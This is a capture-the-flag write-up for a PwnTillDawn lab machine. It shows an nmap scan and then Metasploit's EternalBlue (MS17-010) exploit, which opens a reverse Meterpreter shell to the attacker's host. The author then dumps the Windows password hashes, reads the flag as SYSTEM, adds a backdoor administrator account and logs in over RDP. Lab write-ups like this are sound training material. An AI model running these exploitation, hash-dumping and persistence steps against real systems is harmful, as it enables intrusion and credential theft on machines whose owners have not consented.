As always we start with a nmap scan
# Nmap 7.80 scan initiated Wed Aug 26 10:02:31 2020 as: nmap -Pn -oN 242.nmap 10.150.150.242 Nmap scan report for 10.150.150.242 Host is up (0.031s latency). Not shown: 986 closed ports PORT STATE SERVICE 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1433/tcp open ms-sql-s 3389/tcp open ms-wbt-server 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49156/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown # Nmap done at Wed Aug 26 10:02:39 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds ┌─[user@parrot-virtual]─[~/ptd] └──╼ $
.
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.150.150.242 rhost => 10.150.150.242 msf6 auxiliary(scanner/smb/smb_ms17_010) > run [+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit) [*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_ms17_010) > msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.150.150.242 rhosts => 10.150.150.242 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 10.66.66.210:4444 [*] 10.150.150.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.150.150.242:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit) [*] 10.150.150.242:445 - Scanned 1 of 1 hosts (100% complete) [*] 10.150.150.242:445 - Connecting to target for exploitation. [+] 10.150.150.242:445 - Connection established for exploitation. [+] 10.150.150.242:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.150.150.242:445 - CORE raw buffer dump (53 bytes) [*] 10.150.150.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 10.150.150.242:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris [*] 10.150.150.242:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P [*] 10.150.150.242:445 - 0x00000030 61 63 6b 20 31 ack 1 [+] 10.150.150.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.150.150.242:445 - Trying exploit with 12 Groom Allocations. [*] 10.150.150.242:445 - Sending all but last fragment of exploit packet [*] 10.150.150.242:445 - Starting non-paged pool grooming [+] 10.150.150.242:445 - Sending SMBv2 buffers [+] 10.150.150.242:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 10.150.150.242:445 - Sending final SMBv2 buffers. [*] 10.150.150.242:445 - Sending last fragment of exploit packet! [*] 10.150.150.242:445 - Receiving response from exploit packet [+] 10.150.150.242:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 10.150.150.242:445 - Sending egg to corrupted connection. [*] 10.150.150.242:445 - Triggering free of corrupted buffer. [*] Sending stage (200262 bytes) to 10.150.150.242 [*] Meterpreter session 1 opened (10.66.66.210:4444 -> 10.150.150.242:51229) at 2020-08-26 10:09:19 +0100 [+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.150.150.242:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:483c7adb3e1378e9a187b42baa228745::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: meterpreter > shell Process 3660 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\users\Administrator.GNBUSCA-W054\desktop>whoami whoami nt authority\system c:\users\Administrator.GNBUSCA-W054\desktop> c:\Users\Administrator.GNBUSCA-W054\Desktop>type FLAG34.txt type FLAG34.txt c2e9e102e55d5697ed2f9a7ea63708c1cc411b79 c:\Users\Administrator.GNBUSCA-W054\Desktop>
c:\Users\Administrator.GNBUSCA-W054\Desktop>net user /ADD puck Geheim2020
net user /ADD puck Geheim2020
The command completed successfully.
c:\Users\Administrator.GNBUSCA-W054\Desktop>net localgroup administrators /add puck
net localgroup administrators /add puck
The command completed successfully.
connect with rdp
┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.242
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.